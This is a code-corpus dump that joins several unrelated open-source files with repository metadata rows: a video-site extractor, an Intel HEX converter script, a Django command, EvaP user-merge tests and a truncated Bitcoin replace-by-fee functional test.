                # None on failure, which would raise TypeError on ['url']
                # before the falsiness check below — confirm intended.
                format_url = self._download_json(
                    source_url, lesson_id,
                    'Downloading %s source JSON' % format_id, query={
                        'f': ext,
                        'r': resolution['height'],
                    }, headers={
                        'Referer': url,
                    }, fatal=False)['url']
                if not format_url:
                    continue
                f = resolution.copy()
                f.update({
                    'url': format_url,
                    'ext': ext,
                    'format_id': format_id,
                })
                formats.append(f)
        self._sort_formats(formats)

        # English transcript is served at a predictable VTT location.
        subtitles = {
            'en': [{
                'url': '%s/transcripts/%s.vtt' % (self._API_BASE, lesson_id),
            }]
        }

        return {
            'id': lesson_id,
            'title': lesson_id,
            'formats': formats,
            'subtitles': subtitles
        }
class FrontendMastersLessonIE(FrontendMastersPageBaseIE):
    """Resolves a lesson page URL (course slug + lesson slug) to its video."""
    _VALID_URL = r'https?://(?:www\.)?frontendmasters\.com/courses/(?P<course_name>[^/]+)/(?P<lesson_name>[^/]+)'
    _TEST = {
        'url': 'https://frontendmasters.com/courses/web-development/tools',
        'info_dict': {
            'id': 'a2qogef6ba',
            'display_id': 'tools',
            'ext': 'mp4',
            'title': 'Tools',
            'description': 'md5:82c1ea6472e88ed5acd1829fe992e4f7',
            'thumbnail': r're:^https?://.*\.jpg$',
            'chapter': 'Introduction',
            'chapter_number': 1,
        },
        'params': {
            'skip_download': True,
        },
        'skip': 'Requires FrontendMasters account credentials',
    }

    def _real_extract(self, url):
        mobj = self._match_valid_url(url)
        course_name, lesson_name = mobj.group('course_name', 'lesson_name')

        course = self._download_course(course_name, url)

        # Find the lesson whose slug matches the URL's lesson segment.
        lesson_id, lesson = next(
            (video_id, data)
            for video_id, data in course['lessonData'].items()
            if data.get('slug') == lesson_name)

        chapters = self._extract_chapters(course)
        return self._extract_lesson(chapters, lesson_id, lesson)
class FrontendMastersCourseIE(FrontendMastersPageBaseIE):
    """Extracts a whole course as a playlist of lesson entries."""
    _VALID_URL = r'https?://(?:www\.)?frontendmasters\.com/courses/(?P<id>[^/]+)'
    _TEST = {
        'url': 'https://frontendmasters.com/courses/web-development/',
        'info_dict': {
            'id': 'web-development',
            'title': 'Introduction to Web Development',
            'description': 'md5:9317e6e842098bf725d62360e52d49a6',
        },
        'playlist_count': 81,
        'skip': 'Requires FrontendMasters account credentials',
    }

    @classmethod
    def suitable(cls, url):
        # Defer lesson URLs (which also match our pattern) to the lesson
        # extractor. Note the explicit super() target: MRO lookup starts
        # *after* FrontendMastersBaseIE, i.e. at InfoExtractor.suitable.
        return False if FrontendMastersLessonIE.suitable(url) else super(
            FrontendMastersBaseIE, cls).suitable(url)

    def _real_extract(self, url):
        course_name = self._match_id(url)

        course = self._download_course(course_name, url)

        chapters = self._extract_chapters(course)
        # Lessons are emitted in their declared course order.
        lessons = sorted(
            course['lessonData'].values(), key=lambda data: data['index'])

        entries = []
        for lesson in lessons:
            lesson_name = lesson.get('slug')
            lesson_id = lesson.get('hash') or lesson.get('statsId')
            if not lesson_id or not lesson_name:
                continue
            entries.append(self._extract_lesson(chapters, lesson_id, lesson))

        title = course.get('title')
        description = course.get('description')

        return self.playlist_result(entries, course_name, title, description)
| 33.409091 | 113 | 0.560884 |
f84f70308497ce4354165d036ecda0e135aac898 | 4,678 | py | Python | scripts/hex2bin.py | pablovillars/intelhex | c9beea9f1000d632057efa7ee15f8d1645d0ca97 | [
"BSD-3-Clause"
] | null | null | null | scripts/hex2bin.py | pablovillars/intelhex | c9beea9f1000d632057efa7ee15f8d1645d0ca97 | [
"BSD-3-Clause"
] | null | null | null | scripts/hex2bin.py | pablovillars/intelhex | c9beea9f1000d632057efa7ee15f8d1645d0ca97 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2005-2018 Alexander Belchenko
# All rights reserved.
#
# Redistribution and use in source and binary forms,
# with or without modification, are permitted provided
# that the following conditions are met:
#
# * Redistributions of source code must retain
# the above copyright notice, this list of conditions
# and the following disclaimer.
# * Redistributions in binary form must reproduce
# the above copyright notice, this list of conditions
# and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the author nor the names
# of its contributors may be used to endorse
# or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Intel HEX file format hex2bin convertor utility.'''
VERSION = '2.3.0'
if __name__ == '__main__':
import getopt
import os
import sys
usage = '''Hex2Bin convertor utility.
Usage:
python hex2bin.py [options] INFILE [OUTFILE]
Arguments:
INFILE name of hex file for processing.
OUTFILE name of output file. If omitted then output
will be writing to stdout.
Options:
-h, --help this help message.
-v, --version version info.
-p, --pad=FF pad byte for empty spaces (ascii hex value).
-r, --range=START:END specify address range for writing output
(ascii hex value).
Range can be in form 'START:' or ':END'.
-l, --length=NNNN,
-s, --size=NNNN size of output (decimal value).
'''
pad = None
start = None
end = None
size = None
try:
opts, args = getopt.getopt(sys.argv[1:], "hvp:r:l:s:",
["help", "version", "pad=", "range=",
"length=", "size="])
for o, a in opts:
if o in ("-h", "--help"):
print(usage)
sys.exit(0)
elif o in ("-v", "--version"):
print(VERSION)
sys.exit(0)
elif o in ("-p", "--pad"):
try:
pad = int(a, 16) & 0x0FF
except:
raise getopt.GetoptError('Bad pad value')
elif o in ("-r", "--range"):
try:
l = a.split(":")
if l[0] != '':
start = int(l[0], 16)
if l[1] != '':
end = int(l[1], 16)
except:
raise getopt.GetoptError('Bad range value(s)')
elif o in ("-l", "--lenght", "-s", "--size"):
try:
size = int(a, 10)
except:
raise getopt.GetoptError('Bad size value')
if start != None and end != None and size != None:
raise getopt.GetoptError('Cannot specify START:END and SIZE simultaneously')
if not args:
raise getopt.GetoptError('Hex file is not specified')
if len(args) > 2:
raise getopt.GetoptError('Too many arguments')
except getopt.GetoptError:
msg = sys.exc_info()[1] # current exception
txt = 'ERROR: '+str(msg) # that's required to get not-so-dumb result from 2to3 tool
print(txt)
print(usage)
sys.exit(2)
fin = args[0]
if not os.path.isfile(fin):
txt = "ERROR: File not found: %s" % fin # that's required to get not-so-dumb result from 2to3 tool
print(txt)
sys.exit(1)
if len(args) == 2:
fout = args[1]
else:
# write to stdout
from intelhex import compat
fout = compat.get_binary_stdout()
from intelhex import hex2bin
sys.exit(hex2bin(fin, fout, start, end, size, pad))
| 35.172932 | 107 | 0.579521 |
229b6ab192226872d3b3a56df57bf2c8db312dab | 647 | py | Python | apps/wiki/management/commands/dump_topics.py | storagebot/kitsune | 613ba2ca09104f330ab77088b452391169096249 | [
"BSD-3-Clause"
] | 2 | 2019-08-19T17:08:47.000Z | 2019-10-05T11:37:02.000Z | apps/wiki/management/commands/dump_topics.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | apps/wiki/management/commands/dump_topics.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | from django.core.management.base import BaseCommand
from taggit.models import TaggedItem
from wiki.models import Document
class Command(BaseCommand):
    help = 'Dumps out a python file with the topic strings.'

    def handle(self, *args, **kwargs):
        """Print a generated Python module listing every KB topic string."""
        # BUGFIX: use parenthesized print calls (valid on both Python 2 and
        # 3) instead of Python-2-only print statements; also rename the
        # misspelled `*arg` catch-all to the conventional `*args`.
        print('##########################################################')
        print('### This file is generated by ./manage.py dump_topics. ###')
        print('##########################################################')
        print('from tower import ugettext as _\n')
        for tag in TaggedItem.tags_for(Document):
            print('_("""{tag}""", "KB Topic")'.format(tag=tag.name))
b3ff712aa637333e97271cd44bd5b56d05e8873a | 14,323 | py | Python | evap/staff/tests/test_tools.py | Sohn123/EvaP | 8b0ba8365cb673ef59829cf8db5ab829472a9c58 | [
"MIT"
] | null | null | null | evap/staff/tests/test_tools.py | Sohn123/EvaP | 8b0ba8365cb673ef59829cf8db5ab829472a9c58 | [
"MIT"
] | null | null | null | evap/staff/tests/test_tools.py | Sohn123/EvaP | 8b0ba8365cb673ef59829cf8db5ab829472a9c58 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.contrib.auth.models import Group
from django.core.cache import cache
from django.core.cache.utils import make_template_fragment_key
from model_bakery import baker
from evap.evaluation.tests.tools import WebTest
from evap.evaluation.models import Contribution, Course, Evaluation, UserProfile
from evap.rewards.models import RewardPointGranting, RewardPointRedemption
from evap.staff.tools import merge_users, delete_navbar_cache_for_users, remove_user_from_represented_and_ccing_users
class NavbarCacheTest(WebTest):
    def test_navbar_cache_deletion_for_users(self):
        """delete_navbar_cache_for_users must evict only the given users' fragments."""
        user1 = baker.make(UserProfile, email="user1@institution.example.com")
        user2 = baker.make(UserProfile, email="user2@institution.example.com")

        # create navbar caches for anonymous user, user1 and user2
        self.app.get("/")
        self.app.get("/results/", user="user1@institution.example.com")
        self.app.get("/results/", user="user2@institution.example.com")

        cache_key1 = make_template_fragment_key('navbar', [user1.email, 'en'])
        cache_key2 = make_template_fragment_key('navbar', [user2.email, 'en'])
        cache_key_anonymous = make_template_fragment_key('navbar', ['', 'en'])

        # All three fragments must be present before deletion.
        self.assertIsNotNone(cache.get(cache_key1))
        self.assertIsNotNone(cache.get(cache_key2))
        self.assertIsNotNone(cache.get(cache_key_anonymous))

        delete_navbar_cache_for_users([user2])

        # Only user2's fragment is evicted; the others remain cached.
        self.assertIsNotNone(cache.get(cache_key1))
        self.assertIsNone(cache.get(cache_key2))
        self.assertIsNotNone(cache.get(cache_key_anonymous))
class MergeUsersTest(TestCase):
    """Tests for staff.tools.merge_users (merging other_user into main_user)."""

    @classmethod
    def setUpTestData(cls):
        cls.user1 = baker.make(UserProfile, email="test1@institution.example.com")
        cls.user2 = baker.make(UserProfile, email="test2@institution.example.com")
        cls.user3 = baker.make(UserProfile, email="test3@institution.example.com")
        cls.group1 = baker.make(Group, pk=4)
        cls.group2 = baker.make(Group, pk=5)
        cls.main_user = baker.make(UserProfile,
            title="Dr.",
            first_name="Main",
            last_name="",
            email=None,  # test that merging works when taking the email from other user (UniqueConstraint)
            groups=[cls.group1],
            delegates=[cls.user1, cls.user2],
            represented_users=[cls.user3],
            cc_users=[cls.user1],
            ccing_users=[]
        )
        cls.other_user = baker.make(UserProfile,
            title="",
            first_name="Other",
            last_name="User",
            email="other@test.com",
            groups=[cls.group2],
            delegates=[cls.user3],
            represented_users=[cls.user1],
            cc_users=[],
            ccing_users=[cls.user1, cls.user2],
            is_superuser=True
        )
        cls.course1 = baker.make(Course, responsibles=[cls.main_user])
        cls.course2 = baker.make(Course, responsibles=[cls.main_user])
        cls.course3 = baker.make(Course, responsibles=[cls.other_user])
        # evaluation1 has both users as participants, which must make the merge fail.
        cls.evaluation1 = baker.make(Evaluation, course=cls.course1, name_de="evaluation1", participants=[cls.main_user, cls.other_user])
        cls.evaluation2 = baker.make(Evaluation, course=cls.course2, name_de="evaluation2", participants=[cls.main_user], voters=[cls.main_user])
        cls.evaluation3 = baker.make(Evaluation, course=cls.course3, name_de="evaluation3", participants=[cls.other_user], voters=[cls.other_user])
        cls.contribution1 = baker.make(Contribution, contributor=cls.main_user, evaluation=cls.evaluation1)
        cls.contribution2 = baker.make(Contribution, contributor=cls.other_user, evaluation=cls.evaluation1)  # this should make the merge fail
        cls.contribution3 = baker.make(Contribution, contributor=cls.other_user, evaluation=cls.evaluation2)
        cls.rewardpointgranting_main = baker.make(RewardPointGranting, user_profile=cls.main_user)
        cls.rewardpointgranting_other = baker.make(RewardPointGranting, user_profile=cls.other_user)
        cls.rewardpointredemption_main = baker.make(RewardPointRedemption, user_profile=cls.main_user)
        cls.rewardpointredemption_other = baker.make(RewardPointRedemption, user_profile=cls.other_user)

    def setUp(self):
        # merge_users changes these instances in such a way that refresh_from_db doesn't work anymore.
        self.main_user = UserProfile.objects.get(first_name="Main", last_name="")
        self.other_user = UserProfile.objects.get(email="other@test.com")

    def test_merge_handles_all_attributes(self):
        """Every UserProfile field must be considered by merge_users."""
        user1 = baker.make(UserProfile)
        user2 = baker.make(UserProfile)

        all_attrs = list(field.name for field in UserProfile._meta.get_fields(include_hidden=True))

        # these are relations to intermediate models generated by django for m2m relations.
        # we can safely ignore these since the "normal" fields of the m2m relations are present as well.
        all_attrs = list(attr for attr in all_attrs if not attr.startswith("UserProfile_"))

        # equally named fields are not supported, sorry
        self.assertEqual(len(all_attrs), len(set(all_attrs)))

        # some attributes we don't care about when merging
        ignored_attrs = {
            'id',  # nothing to merge here
            'password',  # not used in production
            'last_login',  # something to really not care about
            'user_permissions',  # we don't use permissions
            'logentry',  # wtf
            'login_key',  # we decided to discard other_user's login key
            'login_key_valid_until',  # not worth dealing with
            'language',  # Not worth dealing with
            'Evaluation_voters+',  # some more intermediate models, for an explanation see above
            'Evaluation_participants+',  # intermediate model
        }
        expected_attrs = set(all_attrs) - ignored_attrs

        # actual merge happens here
        merged_user, errors, warnings = merge_users(user1, user2)
        self.assertEqual(errors, [])
        self.assertEqual(warnings, [])

        handled_attrs = set(merged_user.keys())

        # attributes that are handled in the merge method but that are not present in the merged_user dict
        # add attributes here only if you're actually dealing with them in merge_users().
        additional_handled_attrs = {
            'grades_last_modified_user+',
            'Course_responsibles+'
        }

        actual_attrs = handled_attrs | additional_handled_attrs

        self.assertEqual(expected_attrs, actual_attrs)

    def test_merge_users_does_not_change_data_on_fail(self):
        """A failing merge (conflicting contributions/participations) must change nothing."""
        __, errors, warnings = merge_users(self.main_user, self.other_user)  # merge should fail
        self.assertCountEqual(errors, ['contributions', 'evaluations_participating_in'])
        self.assertCountEqual(warnings, ['rewards'])

        # assert that nothing has changed
        self.main_user.refresh_from_db()
        self.other_user.refresh_from_db()
        self.assertEqual(self.main_user.title, "Dr.")
        self.assertEqual(self.main_user.first_name, "Main")
        self.assertEqual(self.main_user.last_name, "")
        self.assertEqual(self.main_user.email, None)
        self.assertFalse(self.main_user.is_superuser)
        self.assertEqual(set(self.main_user.groups.all()), {self.group1})
        self.assertEqual(set(self.main_user.delegates.all()), {self.user1, self.user2})
        self.assertEqual(set(self.main_user.represented_users.all()), {self.user3})
        self.assertEqual(set(self.main_user.cc_users.all()), {self.user1})
        self.assertEqual(set(self.main_user.ccing_users.all()), set())
        self.assertTrue(RewardPointGranting.objects.filter(user_profile=self.main_user).exists())
        self.assertTrue(RewardPointRedemption.objects.filter(user_profile=self.main_user).exists())
        self.assertEqual(self.other_user.title, "")
        self.assertEqual(self.other_user.first_name, "Other")
        self.assertEqual(self.other_user.last_name, "User")
        self.assertEqual(self.other_user.email, "other@test.com")
        self.assertEqual(set(self.other_user.groups.all()), {self.group2})
        self.assertEqual(set(self.other_user.delegates.all()), {self.user3})
        self.assertEqual(set(self.other_user.represented_users.all()), {self.user1})
        self.assertEqual(set(self.other_user.cc_users.all()), set())
        self.assertEqual(set(self.other_user.ccing_users.all()), {self.user1, self.user2})
        self.assertTrue(RewardPointGranting.objects.filter(user_profile=self.other_user).exists())
        self.assertTrue(RewardPointRedemption.objects.filter(user_profile=self.other_user).exists())
        self.assertEqual(set(self.course1.responsibles.all()), {self.main_user})
        self.assertEqual(set(self.course2.responsibles.all()), {self.main_user})
        self.assertEqual(set(self.course3.responsibles.all()), {self.other_user})
        # BUGFIX: this assertion appeared twice; the duplicate was removed.
        self.assertEqual(set(self.evaluation1.participants.all()), {self.main_user, self.other_user})
        self.assertEqual(set(self.evaluation2.participants.all()), {self.main_user})
        self.assertEqual(set(self.evaluation2.voters.all()), {self.main_user})
        self.assertEqual(set(self.evaluation3.participants.all()), {self.other_user})
        self.assertEqual(set(self.evaluation3.voters.all()), {self.other_user})

    def test_merge_users_changes_data_on_success(self):
        """A successful merge must move all of other_user's data onto main_user."""
        # Fix data so that the merge will not fail as in test_merge_users_does_not_change_data_on_fail
        self.evaluation1.participants.set([self.main_user])
        self.contribution2.delete()

        __, errors, warnings = merge_users(self.main_user, self.other_user)  # merge should succeed
        self.assertEqual(errors, [])
        self.assertEqual(warnings, ['rewards'])  # rewards warning is still there

        self.main_user.refresh_from_db()
        self.assertEqual(self.main_user.title, "Dr.")
        self.assertEqual(self.main_user.first_name, "Main")
        self.assertEqual(self.main_user.last_name, "User")
        self.assertEqual(self.main_user.email, "other@test.com")
        self.assertTrue(self.main_user.is_superuser)
        self.assertEqual(set(self.main_user.groups.all()), {self.group1, self.group2})
        self.assertEqual(set(self.main_user.delegates.all()), {self.user1, self.user2, self.user3})
        self.assertEqual(set(self.main_user.represented_users.all()), {self.user1, self.user3})
        self.assertEqual(set(self.main_user.cc_users.all()), {self.user1})
        self.assertEqual(set(self.main_user.ccing_users.all()), {self.user1, self.user2})
        self.assertTrue(RewardPointGranting.objects.filter(user_profile=self.main_user).exists())
        self.assertTrue(RewardPointRedemption.objects.filter(user_profile=self.main_user).exists())
        self.assertEqual(set(self.course1.responsibles.all()), {self.main_user})
        self.assertEqual(set(self.course2.responsibles.all()), {self.main_user})
        # BUGFIX: previously checked course2 twice; course3's responsibility
        # must have been transferred from other_user to main_user.
        self.assertEqual(set(self.course3.responsibles.all()), {self.main_user})
        self.assertEqual(set(self.evaluation1.participants.all()), {self.main_user})
        self.assertEqual(set(self.evaluation2.participants.all()), {self.main_user})
        self.assertEqual(set(self.evaluation2.voters.all()), {self.main_user})
        self.assertEqual(set(self.evaluation3.participants.all()), {self.main_user})
        self.assertEqual(set(self.evaluation3.voters.all()), {self.main_user})
        # NOTE(review): no fixture user ever had this email (other_user used
        # "other@test.com", which main_user takes over), so this assertion is
        # vacuous — confirm the intended target.
        self.assertFalse(UserProfile.objects.filter(email="other_user@institution.example.com").exists())
        self.assertFalse(RewardPointGranting.objects.filter(user_profile=self.other_user).exists())
        self.assertFalse(RewardPointRedemption.objects.filter(user_profile=self.other_user).exists())
class RemoveUserFromRepresentedAndCCingUsersTest(TestCase):
    """Tests for staff.tools.remove_user_from_represented_and_ccing_users."""

    def test_remove_user_from_represented_and_ccing_users(self):
        delete_user = baker.make(UserProfile)
        delete_user2 = baker.make(UserProfile)
        user1 = baker.make(UserProfile, delegates=[delete_user, delete_user2], cc_users=[delete_user])
        user2 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user, delete_user2])
        messages = remove_user_from_represented_and_ccing_users(delete_user)
        # delete_user is removed from both relations of both users, and one
        # message is produced per removed relation entry (4 in total).
        self.assertEqual([set(user1.delegates.all()), set(user1.cc_users.all())], [{delete_user2}, set()])
        self.assertEqual([set(user2.delegates.all()), set(user2.cc_users.all())], [set(), {delete_user2}])
        self.assertEqual(len(messages), 4)
        messages2 = remove_user_from_represented_and_ccing_users(delete_user2)
        self.assertEqual([set(user1.delegates.all()), set(user1.cc_users.all())], [set(), set()])
        self.assertEqual([set(user2.delegates.all()), set(user2.cc_users.all())], [set(), set()])
        self.assertEqual(len(messages2), 2)

    def test_do_not_remove_from_ignored_users(self):
        delete_user = baker.make(UserProfile)
        user1 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user])
        user2 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user])
        # user2 is passed as ignored, so its relations must stay untouched.
        messages = remove_user_from_represented_and_ccing_users(delete_user, [user2])
        self.assertEqual([set(user1.delegates.all()), set(user1.cc_users.all())], [set(), set()])
        self.assertEqual([set(user2.delegates.all()), set(user2.cc_users.all())], [{delete_user}, {delete_user}])
        self.assertEqual(len(messages), 2)

    def test_do_nothing_if_test_run(self):
        delete_user = baker.make(UserProfile)
        user1 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user])
        user2 = baker.make(UserProfile, delegates=[delete_user], cc_users=[delete_user])
        # A test run reports what would happen but performs no changes.
        messages = remove_user_from_represented_and_ccing_users(delete_user, test_run=True)
        self.assertEqual([set(user1.delegates.all()), set(user1.cc_users.all())], [{delete_user}, {delete_user}])
        self.assertEqual([set(user2.delegates.all()), set(user2.cc_users.all())], [{delete_user}, {delete_user}])
        self.assertEqual(len(messages), 4)
| 56.837302 | 172 | 0.702367 |
d759a5aab5ee09f4975c12551de36e2dda78f418 | 26,026 | py | Python | test/functional/feature_rbf.py | cocovault/bitcoin | 5455279a71e01c0bf9ed3070fa597e8f4e750e9d | [
"MIT"
] | 213 | 2015-01-25T19:45:22.000Z | 2022-02-24T22:48:03.000Z | test/functional/feature_rbf.py | cocovault/bitcoin | 5455279a71e01c0bf9ed3070fa597e8f4e750e9d | [
"MIT"
] | 43 | 2015-01-20T19:37:19.000Z | 2021-04-28T13:01:56.000Z | test/functional/feature_rbf.py | cocovault/bitcoin | 5455279a71e01c0bf9ed3070fa597e8f4e750e9d | [
"MIT"
] | 32 | 2015-05-12T17:42:55.000Z | 2022-01-26T11:02:51.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RBF code."""
from copy import deepcopy
from decimal import Decimal
from test_framework.messages import (
BIP125_SEQUENCE_NUMBER,
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
)
from test_framework.script import CScript, OP_DROP
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
from test_framework.script_util import (
DUMMY_P2WPKH_SCRIPT,
DUMMY_2_P2WPKH_SCRIPT,
)
from test_framework.wallet import MiniWallet
MAX_REPLACEMENT_LIMIT = 100
class ReplaceByFeeTest(BitcoinTestFramework):
    """Functional tests for BIP125 replace-by-fee (RBF) mempool behavior."""

    def set_test_params(self):
        """Run a single node with relaxed standardness/package limits."""
        self.num_nodes = 1
        self.extra_args = [
            [
                "-acceptnonstdtxn=1",
                "-maxorphantx=1000",
                "-limitancestorcount=50",
                "-limitancestorsize=101",
                "-limitdescendantcount=200",
                "-limitdescendantsize=101",
            ],
        ]
        self.supports_cli = False

    def skip_test_if_missing_module(self):
        """Skip when the node was built without wallet support."""
        self.skip_if_no_wallet()

    def run_test(self):
        """Run all RBF sub-tests in sequence on a shared MiniWallet."""
        self.wallet = MiniWallet(self.nodes[0])
        # the pre-mined test framework chain contains coinbase outputs to the
        # MiniWallet's default address ADDRESS_BCRT1_P2WSH_OP_TRUE in blocks
        # 76-100 (see method BitcoinTestFramework._initialize_chain())
        self.wallet.rescan_utxos()
        self.log.info("Running test simple doublespend...")
        self.test_simple_doublespend()
        self.log.info("Running test doublespend chain...")
        self.test_doublespend_chain()
        self.log.info("Running test doublespend tree...")
        self.test_doublespend_tree()
        self.log.info("Running test replacement feeperkb...")
        self.test_replacement_feeperkb()
        self.log.info("Running test spends of conflicting outputs...")
        self.test_spends_of_conflicting_outputs()
        self.log.info("Running test new unconfirmed inputs...")
        self.test_new_unconfirmed_inputs()
        self.log.info("Running test too many replacements...")
        self.test_too_many_replacements()
        self.log.info("Running test opt-in...")
        self.test_opt_in()
        self.log.info("Running test RPC...")
        self.test_rpc()
        self.log.info("Running test prioritised transactions...")
        self.test_prioritised_transactions()
        self.log.info("Running test no inherited signaling...")
        self.test_no_inherited_signaling()
        self.log.info("Running test replacement relay fee...")
        self.test_replacement_relay_fee()
        self.log.info("Passed")

    def make_utxo(self, node, amount, confirmed=True, scriptPubKey=DUMMY_P2WPKH_SCRIPT):
        """Create a txout with a given amount and scriptPubKey
        confirmed - txouts created will be confirmed in the blockchain;
        unconfirmed otherwise.

        Returns the COutPoint of the created txout.
        """
        txid, n = self.wallet.send_to(from_node=node, scriptPubKey=scriptPubKey, amount=amount)
        # If requested, ensure txouts are confirmed.
        if confirmed:
            mempool_size = len(node.getrawmempool())
            while mempool_size > 0:
                self.generate(node, 1)
                new_size = len(node.getrawmempool())
                # Error out if we have something stuck in the mempool, as this
                # would likely be a bug.
                assert new_size < mempool_size
                mempool_size = new_size
        return COutPoint(int(txid, 16), n)

    def test_simple_doublespend(self):
        """Simple doublespend"""
        # we use MiniWallet to create a transaction template with inputs correctly set,
        # and modify the output (amount, scriptPubKey) according to our needs
        tx_template = self.wallet.create_self_transfer(from_node=self.nodes[0])['tx']
        tx1a = deepcopy(tx_template)
        tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
        tx1a_hex = tx1a.serialize().hex()
        tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
        # Should fail because we haven't changed the fee
        tx1b = deepcopy(tx_template)
        tx1b.vout = [CTxOut(1 * COIN, DUMMY_2_P2WPKH_SCRIPT)]
        tx1b_hex = tx1b.serialize().hex()
        # This will raise an exception due to insufficient fee
        assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
        # Extra 0.1 BTC fee
        tx1b.vout[0].nValue -= int(0.1 * COIN)
        tx1b_hex = tx1b.serialize().hex()
        # Works when enabled
        tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
        mempool = self.nodes[0].getrawmempool()
        assert tx1a_txid not in mempool
        assert tx1b_txid in mempool
        assert_equal(tx1b_hex, self.nodes[0].getrawtransaction(tx1b_txid))

    def test_doublespend_chain(self):
        """Doublespend of a long chain"""
        initial_nValue = 5 * COIN
        tx0_outpoint = self.make_utxo(self.nodes[0], initial_nValue)
        # Build a chain of unconfirmed transactions, each paying 0.1 BTC fee.
        prevout = tx0_outpoint
        remaining_value = initial_nValue
        chain_txids = []
        while remaining_value > 1 * COIN:
            remaining_value -= int(0.1 * COIN)
            tx = CTransaction()
            tx.vin = [CTxIn(prevout, nSequence=0)]
            tx.vout = [CTxOut(remaining_value, CScript([1, OP_DROP] * 15 + [1]))]
            tx_hex = tx.serialize().hex()
            txid = self.nodes[0].sendrawtransaction(tx_hex, 0)
            chain_txids.append(txid)
            prevout = COutPoint(int(txid, 16), 0)
        # Whether the double-spend is allowed is evaluated by including all
        # child fees - 4 BTC - so this attempt is rejected.
        dbl_tx = CTransaction()
        dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        dbl_tx.vout = [CTxOut(initial_nValue - 3 * COIN, DUMMY_P2WPKH_SCRIPT)]
        dbl_tx_hex = dbl_tx.serialize().hex()
        # This will raise an exception due to insufficient fee
        assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
        # Accepted with sufficient fee
        dbl_tx = CTransaction()
        dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        dbl_tx.vout = [CTxOut(int(0.1 * COIN), DUMMY_P2WPKH_SCRIPT)]
        dbl_tx_hex = dbl_tx.serialize().hex()
        self.nodes[0].sendrawtransaction(dbl_tx_hex, 0)
        mempool = self.nodes[0].getrawmempool()
        for doublespent_txid in chain_txids:
            assert doublespent_txid not in mempool

    def test_doublespend_tree(self):
        """Doublespend of a big tree of transactions"""
        initial_nValue = 5 * COIN
        tx0_outpoint = self.make_utxo(self.nodes[0], initial_nValue)

        # Recursively build a tree of unconfirmed transactions, yielding each
        # broadcast transaction until max_txs have been created.
        def branch(prevout, initial_value, max_txs, tree_width=5, fee=0.00001 * COIN, _total_txs=None):
            if _total_txs is None:
                _total_txs = [0]
            if _total_txs[0] >= max_txs:
                return
            txout_value = (initial_value - fee) // tree_width
            if txout_value < fee:
                return
            vout = [CTxOut(txout_value, CScript([i+1]))
                    for i in range(tree_width)]
            tx = CTransaction()
            tx.vin = [CTxIn(prevout, nSequence=0)]
            tx.vout = vout
            tx_hex = tx.serialize().hex()
            assert len(tx.serialize()) < 100000
            txid = self.nodes[0].sendrawtransaction(tx_hex, 0)
            yield tx
            _total_txs[0] += 1
            txid = int(txid, 16)
            for i, txout in enumerate(tx.vout):
                for x in branch(COutPoint(txid, i), txout_value,
                                max_txs,
                                tree_width=tree_width, fee=fee,
                                _total_txs=_total_txs):
                    yield x
        fee = int(0.00001 * COIN)
        n = MAX_REPLACEMENT_LIMIT
        tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
        assert_equal(len(tree_txs), n)
        # Attempt double-spend, will fail because too little fee paid
        dbl_tx = CTransaction()
        dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        dbl_tx.vout = [CTxOut(initial_nValue - fee * n, DUMMY_P2WPKH_SCRIPT)]
        dbl_tx_hex = dbl_tx.serialize().hex()
        # This will raise an exception due to insufficient fee
        assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
        # 0.1 BTC fee is enough
        dbl_tx = CTransaction()
        dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
        dbl_tx.vout = [CTxOut(initial_nValue - fee * n - int(0.1 * COIN), DUMMY_P2WPKH_SCRIPT)]
        dbl_tx_hex = dbl_tx.serialize().hex()
        self.nodes[0].sendrawtransaction(dbl_tx_hex, 0)
        mempool = self.nodes[0].getrawmempool()
        for tx in tree_txs:
